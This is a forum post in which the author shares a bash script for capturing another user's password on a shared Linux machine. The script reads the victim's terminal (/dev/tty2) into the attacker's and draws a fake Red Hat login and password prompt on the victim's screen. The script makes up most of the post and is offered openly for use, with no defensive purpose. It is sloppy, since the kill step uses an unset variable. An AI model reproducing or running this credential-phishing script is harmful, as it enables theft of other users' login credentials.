You might remember my last thread about tty hacking ( It turned out that didnt work, -lol-. I got really frustrated because many dismissed it as impossible.
There is no way to read back what the other person is typing unless you are the root user and have installed software specifically for that purpose
. aghh! So i hacked around some more because i knew that it worked and i just came up with a foolproof (no pun intended) method. Here's the script (attacker at tty1, victim at tty2):

#this cat is the big moma:
cat /dev/tty2 >/dev/tty1&
echo -ne >/dev/tty2 #misc commands that dont return anything
true >/dev/tty2
false >/dev/tty2
locate dfdsfds >/dev/tty2
locate otherHw >/dev/tty2
#heres the meat:
clear >/dev/tty2
echo -ne '\n\nRed Hat Linux release 7.1 (Seawolf)\n' >/dev/tty2
echo -ne 'Kernel 2.4.2-2 on an i686\n' >/dev/tty2
echo -ne '\nlocalhost login: ' >/dev/tty2
sleep 5
#redraw the screen; bash at tty2 doesnt have a clue what is #going on, so it thinks $USER that the guy at tty2 entered is a #command:
clear >/dev/tty2
echo -ne '\n\nRed Hat Linux release 7.1 (Seawolf)\n' >/dev/tty2
echo -ne 'Kernel 2.4.2-2 on an i686\n\n' >/dev/tty2
echo -ne "localhost login: $USER\n" >/dev/tty2
echo -ne 'Password: '>/dev/tty2
#the stuff entered after password is the only thing thats #redirected
sleep 5 #give him time to enter his ps
kill -TERM $CATPID #so nothing else gets redirected

Now, 'foolproof' meaning you will get text back after the user enters his username (for some reason, after the cat and misc commands are excecuted, the user at tty2 must enter a string followed by enter before text gets redirected to tty1; and thats just in time for the ps to be redirected!). Now this script is extremely crappy so dont feel stupid asking if you dont know why it's doing what it does. If i learn real scripting ill make a better one and put it on here. Cheers